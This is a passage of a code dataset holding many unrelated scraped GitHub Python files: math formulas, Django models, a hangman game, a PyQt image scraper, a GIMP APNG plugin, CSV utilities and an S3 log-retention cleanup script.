textresult.decode(\"ascii\")\n\n\nEnergy = Function(OD([('m', 'Real')]), 'm*(c**2)')\n\nGravitationalForce = Function(OD([('m1', 'Real'), ('m2', 'Real'), ('d', 'Real')]), '(G*m1*m2)/(d**2)')\n\nPythagorean = Function(OD([('a', 'Real'), ('b', 'Real')]), 'sqrt((a**2)+(b**2))')\n\nStandardNormalDistribution = Function(OD([('x', 'Real')]), '(e**(-(1/2.0)*(x**2)))/sqrt(2*pi)')\n\nLorentzFactor = Function(OD([('v', \"Real\")]), \"1.0/sqrt(1-(v**2)/(c**2))\")\n\nKineticEnergy = Function(OD([('m', \"Real\"), ('v', \"Real\")]), \"(1/2.0)*m*(v**2)\")\n\nMomentum = Function(OD([('k', \"Real\"), ('m', \"Real\")]), \"sqrt(2)*sqrt(k*m)\")\n\nMinimumPowerRequiredToMoveObject = Function(OD([('D', \"Real\"), ('m', \"Real\"), ('t', \"Real\")]), \"(4*(D**2)*m)/(t**3)\")\n\nVelocity = Function(OD([('s', \"Real\"), ('t', \"Real\")]), \"s/t\")\n\nAcceleration = Function(OD([('v', \"Real\"), ('t', \"Real\")]), 'v/t')\n\n\ndef HarmonicNumber(n):\n from .stats.stats import sum\n return sum(lambda x: 1 / x, 1, n)\n","repo_name":"ansg191/Math_Language","sub_path":"amath/formulas.py","file_name":"formulas.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38532102346","text":"def token_transform(tokens, s):\n \"\"\"Return the transformed version of string s,\n where all tokens(included the nested ones too) replaced.\n >>> tokens = {\\\n '$LOCATION$': '$ANIMAL$ park',\\\n '$ANIMAL$': 'dog',\\\n }\n >>> token_transform(tokens, 'Walk the $ANIMAL$ in the $LOCATION$!')\n 'Walk the dog in the dog park!'\n \"\"\"\n result_lst = []\n i, j = 0, 1\n while i < len(s):\n if s[i] != \"$\":\n result_lst.append(s[i])\n i += 1\n j = i + 1\n elif 
s[j] != \"$\":\n j += 1\n else:\n key = s[i:j+1]\n value = tokens[key]\n evaluated_value = token_transform(tokens, s=value)\n tokens[key] = evaluated_value #this will act as a memoization\n result_lst.append(evaluated_value)\n i = j + 1\n j = i + 1\n\n return ''.join(result_lst)\n\ndef testing():\n tokens = {\n '$B$': \"epicly $C$\",\n '$A$': \"pretty $B$ problem $D$\",\n '$D$': \"we have\",\n '$C$': \"clever\",\n }\n print(f\"tokens before the memoization\")\n for token_item in tokens.items():\n print(token_item)\n\n result = 'What a pretty epicly clever problem we have here!'\n assert token_transform(tokens, s=\"What a $A$ here!\") == result, f\"should be '{result}'\"\n print(f\"tokens after the memoization\")\n for token_item in tokens.items():\n print(token_item)\n\nif __name__ == \"__main__\":\n testing()\n print(\"=\"*20)\n print(\"Everything passed\")\n","repo_name":"dragoeast/projects","sub_path":"data_structures/dynamic_programming/token_transform.py","file_name":"token_transform.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9802345388","text":"from django.db import models\nfrom django.utils import timezone\n# from urllib.parse import urlparse\nfrom django.contrib.auth.models import User\n\n# category\n\n\nclass Category(models.Model):\n title = models.CharField(max_length=50)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = \"Category\"\n verbose_name_plural = \"Categories\"\n\n\n# storage\nclass Storage(models.Model):\n author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n title = models.CharField(max_length=255)\n description = models.TextField(blank=True)\n # link_path = models.URLField(max_length=250, unique=True)\n link_path = models.CharField(max_length=250)\n cover = models.ImageField(\n upload_to='assets/', blank=True, default=\"assets/default-img.jpg\")\n cover_url = models.CharField(\n max_length=500, default=\"assets/default-img.jpg\", blank=True)\n alt = models.CharField(max_length=255)\n category = models.ForeignKey(Category, related_name='category',\n null=True, on_delete=models.CASCADE)\n private = models.BooleanField(default=False)\n created_date = models.DateTimeField(default=timezone.now)\n favorite = models.ManyToManyField(\n User, related_name='favorite', blank=True)\n\n def __str__(self):\n return self.title\n\n # def url_text(request, self):\n # parsed_url = urlparse(self.link_path)\n # return parsed_url.hostname.replace(\"www.http://localhost:8000/storage/\", \"\") + \"/...\"\n\n\n# favorites\nclass Favorites(models.Model):\n favorites = models.ManyToManyField(Storage, related_name='favorites')\n # favorite = models.ForeignKey(\n # 'Storage', related_name='favorites', null=True, on_delete=models.CASCADE)\n","repo_name":"nataliadelina/linkstorage","sub_path":"storage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5748838184","text":"import re\nimport os\nerros=['/','\\\\','|','/','\\\\','|','O']\nerro=[' ',' ',' ',' ',' ',' ',' ']\ndef corpo(letras,string):#define o corpo\n print(f'Letras usadas:{letras}\\n',\n ' ________\\n',\n '| |\\n',\n '| |\\n',\n f'| {erro[6]}\\n',\n f'| {erro[3]}{erro[5]}{erro[4]}\\n',\n f'| {erro[2]}\\n',\n f'| {erro[0]} {erro[1]}\\n',\n f'| {re.sub(\"_\", \"_ \",string)}\\n')\n\ndef partida():#inicia a partida\n vidas=7\n letras_usadas=''\n 
palavra=input(\"Palavra:\")\n palavra_oculta=re.sub('[a-z]|[A-Z]', '_',palavra)# troca as letras por _\n os.system('cls')#apaga o console\n corpo(letras_usadas,palavra_oculta)\n while palavra_oculta!=palavra and vidas!=0:\n jogador_letra=input('Digite uma letra: ')\n acerto=0\n\n\n for i in range(len(palavra)):\n if jogador_letra.lower()==palavra[i] or jogador_letra.upper()==palavra[i]:\n aux = list(palavra_oculta)#transforma em lista\n aux[i] = palavra[i]\n palavra_oculta = \"\".join(aux)#une a lista\n acerto=1\n elif acerto==0 and i==(len(palavra)-1):\n erro[vidas-1]=erros[vidas-1]\n vidas-=1\n os.system('cls')\n letras_usadas+=jogador_letra + '-'\n corpo(letras_usadas,palavra_oculta)\n if palavra_oculta==palavra:\n print('Parabens, você ganhou')\n else: \n print('Que pena, você perdeu')\n nova_partida=input('Nova partida(s/n)? ')\n os.system('cls')\n if nova_partida.lower()=='s':\n partida()\npartida()\n","repo_name":"igorramiro/jogo-da-forca","sub_path":"forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3777339937","text":"\n## GRADIENT DESCENT VIZ - GUI dashboard\n# Last update: August 2016\n\n\n## INDEX\n# + Dashboard design\n# + Event handlers\n##\n\n\nfrom ipywidgets import widgets\nfrom IPython.display import display, clear_output\n\nfrom grad_desc_functionality import *\n\n\n## DASHBOARD DESIGN -----------------------------------------------------------\n\ndashboard = widgets.VBox()\n\n# Title and spacers\nheader = widgets.HTML(\"
<h1>Separation Hyperplane</h1>\")\nvspace = widgets.HTML(\"<br>\")\nhspace = widgets.HTML(\"&nbsp;&nbsp;--&nbsp;&nbsp;
\")\n\n# Style selection\nslope_slider = widgets.FloatSlider(\n value=2,\n min=-3,\n max=3,\n step=0.1,\n description='Initial Slope:',\n slider_color='blue'\n)\n\noffset_slider = widgets.FloatSlider(\n value=0.5,\n min=-3,\n max=3,\n step=0.1,\n description='Initial Offset:',\n slider_color='blue'\n)\n\nlearn_slider = widgets.FloatSlider(\n value=.5,\n min=0,\n max=1,\n step=0.1,\n description='Learn Rate:',\n slider_color='gray'\n)\n\nplot_button = widgets.Button(description=\"PLOT + Get Margin\")\n\nloss_select = widgets.Dropdown(options=['Hinge Loss', 'Zero-Plus Loss', 'Log Loss'])\n\n\n# HTML\nLOSS_TEMPLATE = '''
<b>LOSS FUNCTIONS:</b>\n<ul>\n  <li>Zero-One Loss: {zo}</li>\n  <li>Hinge Loss: {hg:.2f}</li>\n  <li>Log Loss: {log:.2f}</li>\n</ul>
\n'''\nloss_textarea = widgets.HTML(\n value='',\n )\n\n# Final Layout\nleft_panel = widgets.VBox(children=[slope_slider, vspace, offset_slider, vspace, learn_slider]) \nright_panel = widgets.VBox(children=[vspace, plot_button, vspace, loss_select]) \n\nfooter_panel = widgets.VBox(children=[hspace, loss_textarea])\nbody_panel = widgets.HBox(children=[left_panel, hspace, hspace, hspace, right_panel])\n\ndashboard.children = [header, vspace, body_panel, footer_panel]\n\n\n## EVENT HANDLERS -------------------------------------------------------------\n\ndef plot_on_demand(_):\n input_values = (slope_slider.value, offset_slider.value)\n loss_textarea.value = LOSS_TEMPLATE.format(zo=zero_plus_loss(*input_values),\n hg=hinge_loss(*input_values),\n log=log_loss(*input_values) )\n clear_output()\n grad_descent_plot(slope_slider.value, offset_slider.value, loss_select.value, learn_slider.value)\n\nplot_button.on_click(plot_on_demand)\n\n","repo_name":"WillahScott/grad_descent_viz","sub_path":"grad_desc_gui.py","file_name":"grad_desc_gui.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"18599110819","text":"import sys\nsys.setrecursionlimit(1000000)\nN,M=map(int,sys.stdin.readline().rstrip().split(\" \"))\nmatrix=[]\nfor i in range(N):\n temp=[0 for k in range(N)]\n matrix.append(temp)\n\nedge=[]\nfor i in range(M):\n u,v=map(int,sys.stdin.readline().rstrip().split(\" \"))\n edge.append([u,v])\n\nfor key in edge:\n matrix[key[0]-1][key[1]-1]=1\n matrix[key[1]-1][key[0]-1]=1\n\nvisited=[False for i in range(N)]\ndef DFS(matrix,visited,start):\n for i in range(N):\n if visited[i]==False and matrix[start][i]==1:\n visited[i]=True\n DFS(matrix,visited,i)\n\n\ncount=0\nstart=0\nfor i in range(N):\n if visited[i]==False:\n DFS(matrix,visited,i)\n count+=1\n\nprint(count)\n\n\n\n\n\n","repo_name":"Andrevile/Algorithm","sub_path":"BOJ PS/No.11724 연결 요소의 개수.py","file_name":"No.11724 연결 요소의 개수.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20207779238","text":"import sys\nimport os\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog\nfrom PyQt5.QtCore import pyqtSlot\nfrom datetime import datetime\nimport time\nimport requests\nimport re\nfrom views.MainWindow import Ui_MainWindow\nfrom utils.mihoyoEnum import *\nfrom script.spider_mihoyo import SpiderMihoyo\n\nclass MainWin(QMainWindow, Ui_MainWindow):\n \n # 初始化界面\n def __init__(self):\n\n self.spider_plate = '' # 板块\n self.spider_type = '' # 类型\n self.start_num = 1 # 开始张数\n self.scroll_count = 0 # 滚动次数\n self.cwd = os.getcwd() # 获取当前程序文件位置\n\n self.spider = SpiderMihoyo() # 爬取类实例\n\n super(MainWin, self).__init__()\n self.setupUi(self)\n\n self.init_data()\n self.addEventListener()\n\n self.show()\n \n # 事件监听\n def addEventListener(self):\n self.plateBtn1.clicked.connect(self.plate_checked)\n self.plateBtn2.clicked.connect(self.plate_checked)\n self.plateBtn3.clicked.connect(self.plate_checked)\n self.plateBtn4.clicked.connect(self.plate_checked)\n\n self.typeBtn1.clicked.connect(self.type_checked)\n self.typeBtn2.clicked.connect(self.type_checked)\n self.typeBtn3.clicked.connect(self.type_checked)\n self.typeBtn4.clicked.connect(self.type_checked)\n\n self.startSpinBox.valueChanged.connect(self.spinBox_start)\n self.countSpinBox.valueChanged.connect(self.spinBox_count)\n\n self.pushButton.clicked.connect(self.confirm)\n 
self.chooseFileBtn.clicked.connect(self.choose_dir)\n\n\n # 执行\n def confirm(self):\n\n # 启动网页\n self.log('打开浏览器...')\n self.spider.start()\n self.log('开始爬取...')\n data_list = self.spider.data_spider(self.spider_plate, self.spider_type, self.scroll_count)\n self.log('爬取完成,开始下载...')\n desk = self.create_dir()\n self.download(data_list, desk)\n \n\n # 批量下载\n def download(self, data_list, desk):\n\n count = 0\n for i, data in enumerate(data_list):\n\n if i < self.start_num - 1:\n continue\n try:\n img = data['src'].partition('?')[0]\n suffix = re.findall(r'(.jpg|.jpeg|.png|.gif)$', img)[-1]\n file = f'{desk}/{count + 1}{suffix}'\n\n with open(file, 'wb') as f:\n self.log(f'下载 {img} ...')\n f.write(requests.get(img).content)\n count = count + 1\n \n time.sleep(0.5)\n\n except Exception:\n self.log(f'下载失败, {img}')\n\n self.log(f'下载完成, 共下载{count}张图片')\n\n\n # 选择目录\n def choose_dir(self):\n dir_choose = QFileDialog.getExistingDirectory(self, \"选取文件夹\", self.cwd) # 起始路径\n\n if dir_choose == \"\":\n return\n\n self.saveEditText.setText(dir_choose)\n\n\n # 创建目录\n def create_dir(self):\n \n desk = self.saveEditText.text()\n\n if not os.path.isdir(desk):\n os.makedirs(desk)\n \n return desk\n\n\n # 初始化数据\n def init_data(self):\n self.spinBox_start()\n self.spinBox_count()\n self.plate_checked()\n self.type_checked()\n \n\n # 开始位置\n def spinBox_start(self):\n self.start_num = self.startSpinBox.value()\n \n\n # 滚动次数\n def spinBox_count(self):\n self.scroll_count = self.countSpinBox.value()\n if self.scroll_count == '':\n self.scroll_count = 0\n\n\n # 板块事件\n def plate_checked(self):\n\n if self.plateBtn1.isChecked():\n self.spider_plate = GameType.BH2.value\n\n elif self.plateBtn2.isChecked():\n self.spider_plate = GameType.BH3.value\n\n elif self.plateBtn3.isChecked():\n self.spider_plate = GameType.YS.value\n\n elif self.plateBtn4.isChecked():\n self.spider_plate = GameType.DBY.value\n\n\n # 类型事件\n def type_checked(self):\n\n if self.typeBtn1.isChecked():\n self.spider_type = SearchType.LATEST_REPLY.value\n\n elif self.typeBtn2.isChecked():\n self.spider_type = SearchType.LATEST_RELEASE.value\n\n elif self.typeBtn3.isChecked():\n self.spider_type = SearchType.HOT.value\n\n elif self.typeBtn4.isChecked():\n self.spider_type = SearchType.GOOD.value\n\n\n # 在文本框打印\n def log(self, str):\n self.textEdit.append(str)\n QApplication.processEvents() # 刷新界面\n\n # 窗口关闭事件\n def closeEvent(self,e):\n self.spider.quit()","repo_name":"konghirt/spider_mys","sub_path":"spider_selenium/views/MyWin.py","file_name":"MyWin.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21768345078","text":"import pandas as pd\nimport statsmodels.api as sm\nfrom sklearn.preprocessing import StandardScaler\nscale = StandardScaler()\n\ndf = pd.read_excel('cars.xls')\n\nf = open(\"results.txt\", \"w+\")\n\n# Choosing only three parameters from the I/P data\nX = df[['Mileage', 'Cylinder', 'Doors']]\ny = df['Price']\n\n#normalises the results in the range of [-1,1] in order to carry out the analysis\nX[['Mileage', 'Cylinder', 'Doors']] = scale.fit_transform(X[['Mileage', 'Cylinder', 'Doors']].as_matrix())\n\nf.write(str(X))\n\nest = sm.OLS(y, X).fit() # OLS - Ordinary Least Square for Multivariate 
Regression\n\nf.write(str(est.summary()))\n\n\n\n","repo_name":"krit-gpt/MachineLearning_Projects","sub_path":"Predictive_Modelling/car_prices/car_prices.py","file_name":"car_prices.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2090449013","text":"# -*- coding: utf-8 -*-\r\n###############################################################################\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n###############################################################################\r\n\r\nfrom odoo import models, fields, api\r\n\r\n\r\nclass FeesDetailReportWizard(models.TransientModel):\r\n\r\n \"\"\" Admission Analysis Wizard \"\"\"\r\n _name = 'fees.detail.report.wizard'\r\n\r\n fees_filter = fields.Selection(\r\n [('student', 'Student'), ('course', 'Course')], 'Fees Filter',\r\n required=True)\r\n student_id = fields.Many2one('lxb.student', 'Student')\r\n course_id = fields.Many2one('lxb.course', 'Course')\r\n\r\n @api.multi\r\n def print_report(self):\r\n data = {}\r\n if self.fees_filter == 'student':\r\n data['fees_filter'] = self.fees_filter\r\n data['student'] = self.student_id.id\r\n else:\r\n data['fees_filter'] = self.fees_filter\r\n data['course'] = self.course_id.id\r\n\r\n report = self.env.ref(\r\n 'lxb-fees.action_report_fees_detail_analysis')\r\n return report.report_action(self, data=data)\r\n","repo_name":"ScottAI/-Odoo---","sub_path":"lexuebao/lxb-fees/wizard/fees_detail_report_wizard.py","file_name":"fees_detail_report_wizard.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"61"} +{"seq_id":"4650446632","text":"import csv\nimport sys\n\ncsv.field_size_limit(sys.maxsize)\n\ndef main():\n if sys.argv[1] == '-t':\n with open(sys.argv[2],'r') as file:\n print(len(file.readlines()))\n sys.exit()\n if sys.argv[1] == '-m':\n with open(sys.argv[2],'w') as output:\n for i in range(3, int(len(sys.argv))):\n with open(sys.argv[i],'r') as file:\n lines = file.readlines()\n output.writelines(lines)\n sys.exit()\n if sys.argv[1] == '-n':\n map = dict()\n for i in range(3, int(len(sys.argv))):\n f = open(sys.argv[i], 'r')\n size = f.readlines()\n f.close()\n with open(sys.argv[i],'r') as file:\n for j in range (0, len(size)):\n line = size[j]\n if len(line) < 3:\n continue\n \n tailLength_num = line.split(',')\n print(tailLength_num[0])\n if tailLength_num[0] in map:\n map[tailLength_num[0]] += int(tailLength_num[1])\n else:\n map[tailLength_num[0]] = int(tailLength_num[1])\n with open(sys.argv[2],'w') as output:\n for key in map:\n output.write(key + ',' + str(map[key]) + '\\n')\n sys.exit()\n if sys.argv[1] == '-l':\n output = open(sys.argv[3], 'w')\n discard = 0\n with open(sys.argv[2],'r') as file:\n csvreader = csv.reader(file, delimiter=' ')\n for row in csvreader:\n if len(row) < 2:\n discard += 1\n print(\"Discard #\" + str(discard))\n print(row)\n continue\n editscript = row[1].split('|')\n for i in range(0, len(editscript)):\n if editscript[i] == '':\n del editscript[i]\n #print(row[0] + \": \" + str(len(editscript)))\n output.write(row[0] + \",\" + str(len(editscript)) + '\\n')\n output.close()\n sys.exit()\n \n if len(sys.argv) != 4 and (sys.argv[1] != '-m' or sys.argv[1] != '-t'):\n print('Usage: csv_divider.py [option] ')\n print('option: -m merge csv file into n files')\n print('option: -t test')\n print('option: -l calculate the length of each tail')\n sys.exit(1)\n \n \n 
with open(sys.argv[1],'r') as file:\n tmp = []\n lines = file.readlines()\n size = len(lines)\n divisor = int(len(lines)/int(sys.argv[3]))\n j = 0\n k = 1\n for i in range(0, size):\n tmp.append(lines[i])\n if j > divisor or i == size -1:\n j = 0\n with open(sys.argv[2] + '_' + str(k) + '.csv', 'w') as output:\n output.writelines(tmp)\n tmp = []\n k += 1\n \n j += 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LuZack/2023_KCSE_ACEA","sub_path":"csv_divider.py","file_name":"csv_divider.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12639892013","text":"#!/usr/bin/env python\n\nfrom gimpfu import *\nimport os\nimport json\nfrom os import unlink, listdir, chdir\nfrom os.path import isfile, join\nimport subprocess\n\nasm = 'apngasm'\ns = '-s'\nl = '-l'\ncombine = ''\nmetafile = 'layermeta.json'\n\nformstr = ' {0}'\n\ndef get_pngs(path):\n tmp = [i for i in listdir(path) if isfile(join(path, i))]\n tmp2 = [y for y in tmp if '.png' in y]\n tmp2.sort()\n return tmp2\n\ndef assemble_apng(img, drw, filename, filepath, skip, loop):\n\t# removing potential previous animations\n\toutfile = os.path.join(filepath, filename)\n\tpl = get_pngs(filepath)\n\n\tchdir(filepath)\n\tfor i in pl:\n\t\tif isfile(i):\n\t\t\tunlink(i)\n\n\t# create frames and data\n\tpdb.python_fu_export_image_layers(img, drw, filepath)\n\n\t# write command line\n\tmetaoutfile = join(filepath, metafile)\n\tpnglist = get_pngs(filepath)\n\n\t## configuration\n\tglobal asm\n\tcmdline = []\n\tcmdline.append(asm)\n\tif skip:\n\t\tcmdline.append(s)\n\tif loop>0:\n\t\tcmdline.append(l)\n\t\tcmdline.append(loop)\n\n\t## frames\n\twith open(metaoutfile, 'r') as fmeta:\n\t\tframedata = json.load(fmeta)\n\tfor i in pnglist:\n\t\tmd = framedata[i]\n\t\tcmdline.append(i)\n\t\tdur = int(md[0])\n\t\tcmdline.append(str(dur))\n\n\tpdb.gimp_message(cmdline)\n\n\t# assemble animation\n\tsubprocess.call(cmdline)\n\nregister(\n\t\"assemble_apng\",\n\t\"create an animated PNG\",\n\t\"take a list of frames and metadata and create an animated PNG with an external assembler\",\n\t\"me\",\n\t\"me\",\n\t\"2018\",\n\t\"/Python-Fu/APNGAssembler\",\n\t\"* or RGB* or other filetype\",\n\t[\n\t(PF_FILENAME, \"filename\", \"Output file\", \"output.png\"),\n\t(PF_DIRNAME, \"filepath\", \"Output directory\", \"/tmp\"),\n\t(PF_BOOL, \"skip\" ,\"First frame is not part of the animation\", True),\n\t(PF_SPINNER, \"loop\" ,\"Times the animation loops (0=infinite)\",0,(0,100,1))\n\t],\n\t[],\n\tassemble_apng)\n\nmain()\n","repo_name":"TheRF/gimp_plugins","sub_path":"gimpapngassemble.py","file_name":"gimpapngassemble.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5289023034","text":"\"\"\"\nA class to represent Controls\n\"\"\"\n\nfrom collections import UserDict\n\nimport numpy as np\nfrom scipy.stats import lognorm\n\n\nclass Control(UserDict):\n \"\"\"\n A class to represent Controls\n \"\"\"\n\n def __init__(\n self, name: str, cost: float, reduction: float, implemented: bool = True\n ) -> None:\n self.data = {}\n self.data[\"name\"] = name\n self.data[\"cost\"] = cost\n self.data[\"reduction\"] = reduction\n self.data[\"implemented\"] = implemented\n\n def evaluate_lognormal(self, iterations=1):\n return Control(\n name=self.data[\"name\"],\n cost=lognorm.ppf(np.random.rand(iterations), s=np.log(self.data[\"cost\"])),\n 
reduction=lognorm.ppf(\n np.random.rand(iterations), s=np.log(self.data[\"reduction\"])\n ),\n implemented=self.data[\"implemented\"],\n )\n\n\nclass Controls(UserDict):\n \"\"\"\n A class to hold multiple Controls\n \"\"\"\n\n def __init__(self) -> None:\n self.data = {}\n\n def new(self, name: str, cost: float, reduction: float) -> Control:\n \"\"\"\n A method to add a new controls to the Controls class\n \"\"\"\n self.data[name] = Control(name, cost, reduction)\n return self.data[name]\n\n def costs(self):\n \"\"\"\n A method to compute the deterministic costs of implemented controls in a Controls class\n \"\"\"\n return np.sum(\n list(\n map(\n lambda x: x[\"cost\"] if x[\"implemented\"] is True else 0,\n self.data.values(),\n )\n )\n )\n\n def costs_lognormal(self):\n \"\"\"\n A method to compute the stochastic costs of implemented controls in a Controls class\n \"\"\"\n return np.sum(\n list(\n map(\n lambda x: x.evaluate_lognormal().data[\"cost\"]\n if x.data[\"implemented\"] is True\n else 0,\n self,\n )\n )\n )\n","repo_name":"davidbailey/RAIL","sub_path":"rail/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5241466528","text":"import math\nimport sys\n\nploidy = int(sys.argv[1])\n\nwith open(\"./output/sample.bam_ratio.BedGraph\") as bed:\n with open(\"./output/sample.bam_ratio_log2_circos.txt\", \"w+\") as olog2r:\n for line in bed.readlines():\n ls = line.split()\n if ls[0] != \"track\" and float(ls[3]) > 0:\n log2_ratio = math.log2(float(ls[3]) / ploidy)\n olog2r.write(\"{}\\t{}\\t{}\\t{}\\n\".format(ls[0], ls[1], ls[2], log2_ratio))\n\nwith open(\"./genome.fa.fai\") as fai:\n with open(\"./output/karyotype_circos.txt\", \"w+\") as ochr:\n for line in fai.readlines():\n ls = line.split()\n ochr.write(\"chr - {}\\t{}\\t0\\t{}\\t{}\\n\".format(ls[0], ls[0].strip(\"chr\").lower(), ls[1], ls[0]))\n","repo_name":"galaxyproject/tools-iuc","sub_path":"tools/freec/ratio2circos.py","file_name":"ratio2circos.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"61"} +{"seq_id":"8211226656","text":"import pytorch_lightning as pl\nfrom datamodule.dm import CustomDataModule\nfrom model.plnet import LightModule\n\ndef test(ckpt, args, fold):\n dm= CustomDataModule(args)\n dm.set_fold_num(fold)\n dm.setup('test')\n \n model= LightModule(args).load_from_checkpoint(checkpoint_path= ckpt, args= args)\n \n test_config= dict(\n accelerator= args.is_gpu,\n devices= args.device,\n precision= args.half\n )\n \n trainer= pl.Trainer(**test_config)\n trainer.test(model, dm)\n \n return model.value_list\n ","repo_name":"SuhanC/ML-competition-archives","sub_path":"Dacon_BRCA_recur_prediction_Histology+Text/train/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30629761848","text":"'''\nCreated on Feb 10, 2015\n\n@author: Ivan Varus\n'''\n\nimport sys\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n print('Usage: FizzBuzz sample.txt')\n exit(1)\n\n f = open(sys.argv[1])\n if not f:\n print('Error opening file')\n exit(1)\n\n for test in f:\n inums = test.split()\n if len(inums) == 3:\n onums = []\n for i in range(1, int(inums[2]) + 1):\n onum = ''\n if i % int(inums[0]) == 0:\n onum = 'F'\n if i % int(inums[1]) == 0:\n onum = onum + 'B'\n if 
len(onum) == 0:\n onum = str(i)\n onums.append(onum)\n print(' '.join(onums))\n f.close()\n","repo_name":"ivarus/Challenges","sub_path":"CodeEval/src/Easy/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25254181578","text":"\"\"\"\nStatistics views.\n\"\"\"\n\nfrom fastapi import APIRouter\n\nfrom use_cases import count_checks_per_url\n\n\nstatistics_router = APIRouter(\n prefix='/api/statistics',\n tags=['parser'],\n)\n\n\n@statistics_router.get('/checks_per_site')\nasync def get_checks_per_site():\n \"\"\"Get stats per site.\"\"\"\n urls = await count_checks_per_url()\n urls = [dict(count=c, url=url) for c, url in urls]\n return urls\n","repo_name":"NorthShine/moscowcityhack-backend-api","sub_path":"src/views/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"258849593","text":"#!/usr/bin/python3\nimport boto3\nimport datetime\nimport subprocess,shlex\nfrom botocore.exceptions import ClientError\nimport os,sys\nimport threading\nimport re\n\nregion = os.environ.get('REGION_NAME', None)\nif region == None:\n region = 'eu-west-1'\nretention = int(os.environ.get('RETENTION', 0))\nif retention == 0:\n retention = 365\nprofile = None\nbucket = os.environ.get('LOG_BUCKET', None)\nif bucket == None:\n bucket = 'redacted'\napp = os.environ.get('APP_LIST', '').split(',')\nif app == ['']:\n app = ['redacted']\ndt = os.environ.get('START_DATE', '').split('-')\nif dt == ['']:\n start_date = datetime.datetime(2017,8,1)\nelif len(dt) != 3:\n print ('please key-in correct START_DATE, eg: 2017-08-01')\n sys.exit(-1)\nelse:\n start_date = datetime.datetime(int(dt[0]), int(dt[1]), int(dt[2]))\ntoday = datetime.datetime.now()\nend_date = today - datetime.timedelta(retention)\ndate_pool = list()\nwhile start_date <= end_date:\n date_prefix = 'logyear={0}/logmonth={1}/logday={2}'.format(start_date.strftime('%Y'), start_date.strftime('%m'), start_date.strftime('%d'))\n date_pool.append(date_prefix)\n start_date += datetime.timedelta(1)\n\nclass ProgressPercentage(object):\n def __init__(self, filename):\n self._filename = filename\n self._size = float(os.path.getsize(filename))\n self._seen_so_far = 0\n self._lock = threading.Lock()\n\n def __call__(self, bytes_amount):\n # To simplify we'll assume this is hooked up\n # to a single filename.\n with self._lock:\n self._seen_so_far += bytes_amount\n percentage = (self._seen_so_far / self._size) * 100\n sys.stdout.write(\n \"\\r%s %s / %s (%.2f%%)\" % (\n self._filename, self._seen_so_far, self._size,\n percentage))\n sys.stdout.flush()\n\ndef lst_object(app_name, date_prefix=date_prefix, Bucket='cdn-log-statistics'):\n Prefix = '{0}/{1}/'.format(app_name, date_prefix)\n session = boto3.Session(profile_name = profile)\n s3_client = session.client('s3', region_name = region)\n try:\n response = s3_client.list_objects_v2(\n Bucket = Bucket,\n Prefix = Prefix\n )\n except ClientError as e:\n print ('Unexpected Error: {0}'.format(e))\n return response\n\ndef main():\n remove_lst=list()\n for date_prefix in date_pool:\n for app_name in app:\n if 'Contents' not in lst_object(app_name + '_cdn_logs', Bucket=bucket, date_prefix=date_prefix):\n continue\n for content in lst_object(app_name + '_cdn_logs', Bucket=bucket, date_prefix=date_prefix)['Contents']:\n remove_lst.append({\n 'Key': 
